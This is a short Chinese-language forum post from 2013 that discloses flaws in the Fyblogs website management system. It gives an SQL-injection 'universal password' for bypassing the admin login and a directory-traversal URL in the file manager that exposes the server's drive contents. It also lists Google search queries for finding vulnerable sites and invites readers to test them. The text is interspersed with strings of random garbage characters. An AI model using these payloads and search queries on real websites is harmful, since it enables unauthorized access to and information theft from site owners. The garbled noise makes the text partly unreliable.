漏洞类型: 未授权访问/权限绕过
0 @5 I7 a: i4 x6 T+ t4 T$ |) z+ b0 a% a$ ~! A- z' z
简要描述:
3 {7 R- @( U( `: e5 S4 q! _, N# ?! V3 u% \
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!$ z0 N" M- A. ]% X- o4 J
3 D; a/ z( a( G* ~* }
详细说明:* R0 M* R; X) n, r! t. G/ N: A9 t* P
# d5 g* N t4 Z5 M后台万能密码 'or'='or'1 \$ ^) ^. m& }- E, M/ O
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!5 E) a. L# J/ S' I" P @
admin/uploadfile.asp?currentFolder=/upfiles/../
! q1 }( R9 c* b" w. X; m; d8 \; |/ X) `
漏洞证明:' n a+ t6 t, E4 g
0 e/ A K% l8 Y/ G4 G/ ~谷歌:inurl:type.asp?id=1 新闻中心8 n9 o/ {6 `6 y8 r7 W }9 b1 _
或者 :inurl:download_ok.asp?
. m2 ^* p* t& j( i) ?! j6 m9 a4 |7 l( x2 H
可以测试/ @# R5 O. l$ y, Q; i! G+ y
( m1 U" S- h0 R! x- Y, X
; {+ h/ r2 e" d1 G7 |7 [/ x |
发表于 2013-3-7 13:07:46
收藏
支持
反对